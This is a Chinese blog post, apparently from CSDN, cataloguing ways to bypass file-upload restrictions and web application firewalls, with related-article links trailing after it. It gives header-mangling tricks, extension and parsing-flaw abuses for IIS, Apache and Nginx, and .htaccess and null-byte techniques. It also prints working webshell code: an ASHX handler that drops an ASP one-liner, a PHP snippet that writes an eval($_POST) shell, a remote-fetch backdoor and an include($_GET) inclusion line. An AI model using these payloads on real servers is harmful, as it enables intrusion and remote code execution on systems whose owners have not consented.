文件上传绕过的一些姿势

最新推荐文章于 2024-07-04 10:05:57 发布
最新推荐文章于 2024-07-04 10:05:57 发布
阅读量1.3k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37104668/article/details/104826639
版权

WAF绕过
1.绕过思路:对文件的内容,数据。数据包进行处理。

关键点在这里Content-Disposition: form-data; name=“file”; filename=“ian.php”
将form-data; 修改为~form-data;
2.通过替换大小写来进行绕过

Content-Disposition: form-data; name=“file”; filename=“yjh.php”
Content-Type: application/octet-stream
将Content-Disposition 修改为content-Disposition
将 form-data 修改为Form-data
将 Content-Type 修改为content-Type
3.通过删减空格来进行绕过

Content-Disposition: form-data; name=“file”; filename=“yjh.php”
Content-Type: application/octet-stream
将Content-Disposition: form-data 冒号后面 增加或减少一个空格
将form-data; name=“file”; 分号后面 增加或减少一个空格
将 Content-Type: application/octet-stream 冒号后面 增加一个空格
4.通过字符串拼接绕过

看Content-Disposition: form-data; name=“file”; filename=“yjh3.php”
将 form-data 修改为 f+orm-data
将 from-data 修改为 form-d+ata

6.HTTP header 属性值绕过

Content-Disposition: form-data; name=“file”; filename=“yjh.php”
我们通过替换form-data 为*来绕过
Content-Disposition: *; name=“file”; filename=“yjh.php”
7.HTTP header 属性名称绕过

源代码:
Content-Disposition: form-data; name=“image”; filename=“085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content-Disposition: form-data; name=“image”; filename=“085733uykwusqcs8vw8wky.png
C.php”
删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php”.
8.等效替换绕过

原内容:
Content-Type: multipart/form-data; boundary=---------------------------471463142114
修改后:
Content-Type: multipart/form-data; boundary =---------------------------471463142114
boundary后面加入空格。
9.修改编码绕过
使用UTF-16、Unicode、双URL编码等等

MIME类型绕过
上传木马时,提示格式错误。直接抓包修改Content-Type 为正确的格式尝试绕过
多次上传Win特性绕过
多次上传同一个文件,windows会自动更新补全TEST (1).php。
有时会触发条件竞争,导致绕过。
条件竞争绕过
通过BURP不断发包,导致不断写入Webshell,再写入速度频率上超过安全软件查杀频率,导致绕过。
CONTENT-LENGTH绕过
针对这种类型的验证,我们可以通过上传一些非常短的恶意代码来绕过。上传文件的大小取决于,Web服务器上的最大长度限制。我们可以使用不同大小的文件来fuzzing上传程序,从而计算出它的限制范围。
文件内容检测绕过
针对文件内容检测的绕过,一般有两种方式
1.制作图片马
2.文件幻术头绕过
垃圾数据填充绕过
修改HTTP请求,再之中加入大量垃圾数据。

黑名单后缀绕过

文件扩展名绕过
Php除了可以解析php后缀 还可以解析php2.php3,php4 后缀
ashx上传绕过
cer,asa,cdx等等无法使用时候。
解析后就会生成一个test.asp的马,你就可以连接这个test.asp 密码为:put
<%@ WebHandler Language=“C#” Class=“Handler” %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
    context.Response.ContentType = "text/plain";

    //这里会在目录下生成一个test.asp的文件
    StreamWriter file1= File.CreateText(context.Server.MapPath("test.asp"));
    //这里是写入一句话木马   密码是:ptu
    file1.Write("<%response.clear:execute request("put"):response.End%>");
    file1.Flush();
    file1.Close();
}
public bool IsReusable {
    get {
        return false;
    }
}

}
特殊文件名绕过
比如发送的 http包里把文件名改成 test.asp. 或 test.asp_(下划线为空格),这种命名方式
在windows系统里是不被允许的,所以需要在 burp之类里进行修改,然后绕过验证后,会
被windows系统自动去掉后面的点和空格,但要注意Unix/Linux系统没有这个特性。
Windows流特性绕过
php在windows的时候如果文件名+":: D A T A " 会 把 : : DATA"会把:: DATA"::DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。
白名单后缀绕过
00截断绕过上传
php .jpg 空格二进制20改为00
解析漏洞

1.1、IIS6.0解析漏洞

1.目录解析

–创建/xx.asp/,上传图片马,即路径为:/xx.asp/xx.jpg,打开图片会被当着脚本来解析

,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

2、分号解析

–nfck.asp;.jpg(其他类型nfck.php/.jpg nfck.php.jpg)

在IIS6.0下,分号后面的不被解析,会被服务器看成是xx.asp

3、畸形文件名解析

上传.asa.cer.cdx.asax这四种文件格式也会被当着asp脚本来解析

1.2Apache解析漏洞

Apache是从右到左开始判断解析,如果为不可识别解析,就再往左判断

比如nfck.php.owf.rar ".owf"和“.rar”这两种后缀是Apache不可识别解析,Apache就会把该文件解析成PHP

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个nfck.php.rara.jpg.png…

把知道的后缀都写一遍,去测试是否为合法后缀

任意不识别的后缀,自动向上识别

比如禁止上传的文件格式为PHP\ASP\ASPX\ASA等

那么把上传的文件这样写,X.PHP.NFCK

让后面的后缀名识别不了,就上传了一个X.PHP的文件

也可以直接将文件改成X.PHP. 后面加个点,或加个下划线_

1.3、IIS7.0/7.5/Nginx<8.03岖形解析漏洞

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…在默认Fast-CGI开启状况下,黑阔上传一个名字为cracer.jpg,

内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,

然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马 shell.php

注:不仅仅是iis7.0/7.5,只要Fast-CGI开启状况下都可以利用该漏洞

1.4htaccess文件解析

一般为留后门使用,如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

<FilesMatch “shell.jpg”> SetHandler application/x-httpd-php

然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件

1.5双文件上传

条件:

接受两个文件同时上传

只检测了第一个文件扩展名

动易、南方、良精等CMS存在该漏洞

用burpsuite抓包,然后将请求头部分下面的内容负责,开头为-----,结尾为----------

其他地方不用负责,然后粘贴到第一个文件结尾-------后面,把第二个文件开头------去掉

将第一个文件的name=xxxx修改为name=xxxx1,修改文件名为cer或者asa等即可上传成功

前端限制绕过
1.使用BURP抓包修改后重放
2.或者使用浏览器中元素审查,修改允许或禁止上传文件类型。
下载绕过
远程下载文件绕过

<?php $str = file_get_contents('http://127.0.0.1/ian.txt'); $str($_post['ian']); ?>

文件包含绕过
上传图片木马
x = x= x=_GET[‘x’];
include($x);
访问图片地址

why so serious -a
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
上传绕过WAF的15中姿势
06-29
这是一篇围绕如何绕过Web应用防火墙(WAF)进行文件上传的技术文章,旨在帮助安全研究人员和技术人员了解当前绕过技术,并采取相应的防御措施。 ### 一、默认状态 这是最基础的状态,没有对请求头或文件名进行任何...
http上传/下载文件时,Content-Disposition的使用
热门推荐
衍夏成歌的博客
04-27 7万+
Content-disposition是 MIME 协议的扩展,MIME 协议指示 MIME 用户代理如何显示附加的文件。当 Internet Explorer 接收到头时,它会激活文件下载对话框,它的文件名框自动填充了头中指定的文件名。(请注意,这是设计导致的;无法使用此功能将文档保存到用户的计算机上,而不向用户询问保存位置。) Rfc1867中可查 1.      上传文件请求头: Co
ajax上传文件,文件开头出现Content-Disposition: form-data
qq_30285561的博客
06-25 4871
ajax上传文件,文件开头出现Content-Disposition: form-data; 使用触动精灵remote-api的上传文件接口 上传的js代码为: export default function upload (file) { let FromData = new FormData(); FromData.append("imgdata", file); let xhr = new XMLHttpRequest() //new一个XMLHttpRequest对象 xhr.o
java解析请求的字符串参数Content-Disposition: form-data;和&拼接的键值对
最新发布
涛哥是个大帅比
07-04 497
获取到http请求的参数,已经被字符串接收了,需求是需要从字符串中解析出来。一种情况是:另一种是:key1=value1&key2=value2&key3=value3,&拼接的键值对。
阿里首推springboot核心笔记,搭建Eureka注册中心(1)
m0_60452957的博客
08-06 159
#eureka server 配置 eureka: instance: hostname: localhost client: register-with-eureka: false #是否将自己注册到注册中心 fetch-registry: false #是否从eureka获取注册信息 service-url: #配置暴露给eureka client的请求地址defaultZone defaultZone: http://${eureka.instance.hostname
Content-Type的类型详解/前后端对于不同Content-type数据类型的处理
Roxlu7的博客
11-21 1万+
Content-Type头部是在客户端向服务器发送请求时,指定请求体的媒体类型。服务器据此判断请求体的格式,从而正确解析数据。这是一种用于发送表单数据的类型,它会将数据以键值对的形式编码,例如。键和值都会进行URL编码,以避免特殊字符的影响。这种类型的优点是可以发送任何类型的字符,但缺点是不能发送二进制数据,如文件上传,而且URL编码会增加数据的长度,可能会超过服务器的限制。
servlet文件上传技术
xiaofangzi11的博客
03-23 315
Java文件上传的技术有很多,本文主要讲的是java开发过程中,利用form表单上传文件。这一过程主要是利用http协议,向服务器端发出一个POST请求,上传的文件主要放在http请求报文的主体部分,同时,表单中可能还会传递其他信息。   选择文件
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
文件上传绕过思路总结 - 先知社区1
08-03
在网络安全领域,文件上传绕过是一种常见的攻击手段,通常用于突破Web应用防护系统(WAF)的限制,实现恶意文件的上传。以下是对文件上传绕过思路的详细说明: 1. **Accept-Encoding 改变编码类型**: WAF通常会...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
application/octet-stream,http服务器设置响应头让浏览器下载内容
小漠007的专栏
05-23 1万+
当浏览器在请求资源时,会通过http返回头中的content-type决定如何显示/处理将要加载的数据,如果这个类型浏览器能够支持阅览,浏览器就会直接展示该资源,比如png、jpeg、video等格式。
渗透思路笔记
Mark的博客
11-03 2759
Bypass上传绕过 一般思路 另类思路 1、默认状态 Content-Disposition: form-data; name=“filepath”; filename=“f.php” Content-Type: image/png 思路一: Content-Disposition: form-data; name=“filepath”; filename="[0x09]f.php" Content-Type: image/png 思路二:除去双引号的限制 Content-Disposition: for
响应头Content-disposition的作用及用法
时清云的博客
10-09 2415
我们在用做文件下载时,经常会用到响应头Content-disposition来设置文件下载对话框。
第24天-WEB 漏洞-文件上传之 WAF 绕过及安全修复
MCTSOG的博客
03-09 698
思维导图 知识补充 上传参数名解析:明确哪些东西能修改? Content-Disposition:一般可更改 name:表单参数值,不能更改 filename:文件名,可以更改 Content-Type:文件 MIME,视情况更改 常见绕过方法: 防匹配:让检测机制,找不到关键字 (php asp aspx 等) 数据溢出-防匹配(xxx…) 符号变异-防匹配(’ " ;) 数据截断-防匹配( /; 换行) 重复数据-防匹配(参数多次) Payload: 大量垃圾数据缓冲溢出(Content-Disp
Application/octet-stream,http服务器设置响应头让浏览器下载内容
robinson_911的专栏
12-08 3883
application 表明是某种二进制数据 application/octet-stream, application/pkcs12, application/vnd.mspowerpoint, application/xhtml+xml, application/xml, application/pdf。audio 表明是某种音频文件 audio/midi, audio/mpeg, audio/webm, audio/ogg, audio/wav。
文件上传的实现
【蜀山风行】的专栏
07-04 485
上传是最古老的互联网操作之一。 本文介绍使用php和java如何实现对文件上传的处理。
java获取content-disposition,java – 如何使用Apache httpclient获取自定义Content-Disposition行?...
weixin_42515313的博客
03-16 1198
我使用答案here尝试使用数据上传发出POST请求,但我从服务器端有不寻常的要求.服务器是一个PHP脚本,需要Content-Disposition行上的文件名,因为它需要上传文件.Content-Disposition: form-data; name="file"; filename="-"但是,在客户端,我想发布一个内存缓冲区(在这种情况下是一个String)而不是一个文件,但让服务器处理它...
常见Web十大漏洞,常见Web漏洞_十大常见web漏洞(1),阿里P8大佬亲自讲解
2401_84239901的博客
04-11 1037
GQy9bNb-1712803293954)]https://blog.csdn.net/weixin_39934520/article/details/109231480](https://blog.csdn.net/weixin_39934520/article/details/109231480 “(84条消息) PHP中常见的命令执行函数与代码执行函数_echo是命令执行函数吗_红烧兔纸的博客-CSDN博客”)
文件上传漏洞与绕过策略解析
"本文主要介绍了文件上传漏洞的常见绕过方法,包括前端js检测、Content-Type验证、文件后缀验证、文件后缀黑名单、文件头验证、文件内容验证以及文件上传与文件包含的结合。文章提供了针对这些验证的破解策略,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值